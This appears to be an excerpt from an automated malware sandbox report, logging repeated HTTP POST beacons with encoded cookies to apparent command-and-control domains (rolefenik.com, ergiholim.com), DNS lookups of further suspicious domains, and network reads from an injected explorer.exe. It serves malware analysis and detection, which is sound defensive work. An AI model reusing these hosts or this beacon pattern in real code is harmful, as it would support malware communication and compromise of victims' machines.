            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 8_2_02E05078 InternetReadFile,8_2_02E05078
            Source: global trafficDNS traffic detected: DNS query: burjog.com
            Source: global trafficDNS traffic detected: DNS query: samomol.com
            Source: global trafficDNS traffic detected: DNS query: rolefenik.com
            Source: global trafficDNS traffic detected: DNS query: ergiholim.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J07vdHmpTbgXkpU0PT%2FSrvVfERHCS%2FTR%2Fxulfo6PY7tBjXcE4LmIrekqqblqQjd%2FwRtqQGixEER2CCRXuKpZZEiEA9ACPwRJjedptWI%2FYHMI4pHFIfEvVDC%2F5kxgjfVZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070645cb9f9ea-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41334&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=70093&cwnd=32&unsent_bytes=0&cid=ded42fc163fc42e5&ts=542&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4TKJqBpqaLi%2BZ5FR07Esw%2FyQ4uwxTz1tPZ6HCRDt5SHIVQon9ikKGizF0x0K9ri%2Fs1FrpG8UsojAEy%2Fv%2BxI2vvJ7ajnvkvisiOFY6v0FaAFavnbjSFlkTwTzTM1g8i2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20706d7f217360-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=146625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21544&cwnd=32&unsent_bytes=0&cid=0b7508a203288348&ts=777&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kTvOMavf26j1iibm1aSLNkzSrTHJ8zo2tNPLS68zGmD%2BfBCIeeV3uyXhVPjENEDSaF4%2BAvd1dGcxExeHj50dKOy6xyKwUrt3BBOxihOWux85w04LhCEpHpEnvw%2FYeLr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20707d7b97687c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137050&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21240&cwnd=32&unsent_bytes=0&cid=6d163f834ae258d8&ts=721&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FoVGZDhveVTAhV2V2m28QmslPRgNuEg8payeIAXYhRkthudPxLd8lPmCyoa5wM1CMOJxbUQJQNt9XlAgDyDVXw2iB7BrQbwltLsTk4gmsp0CGF6U2nGMBKJQ0Y4zOTi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207085f9bfc978-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33715&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=85957&cwnd=32&unsent_bytes=0&cid=bbef187e0638ecd2&ts=388&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2XnpGIVOuyZm0HGEfwSQ0Q8T1xsObXEkw69DoSwhCZyAfkuH7RYWI7ioxkP8mMSwlI03SlrAhN0sQHYSaww5IGme35dsqq2uVKuRNNbZGWdU%2FbCTv9%2B92hK5%2B%2Bds1vQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070907ae6c93c-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33277&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=87355&cwnd=32&unsent_bytes=0&cid=3ad56ecc8f4f2042&ts=272&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sEfjc1YARPcS6W99KkJZOg28uaSWtwd8isRR8YSuYlkL9DEnP0nM2C94XtEWCbqN4Xvxa%2Fvzw3%2BmdN4%2B0QyqPv%2FFDKM3OPiMQFNtORO5DhKjzkg64Cz0Gw5dxDurxycM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070983c39e375-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=158580&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=19444&cwnd=32&unsent_bytes=0&cid=dce779f60aff2a93&ts=829&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofAS9CWcRnsUuY8sB%2BNZ3KUKUy%2B7LIgaz%2FpEKSThvs8vExT2XEmCF4kjcY5ur1T6yd6CwAXzCT0vQaManc5VhXa0oFDt28gG5sWvjwmeaQzLSNR%2F64kaAkigl3fjAZ3r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070a3df49687d-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=208354&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=13997&cwnd=32&unsent_bytes=0&cid=26dade2761e9e9bf&ts=819&x=0"
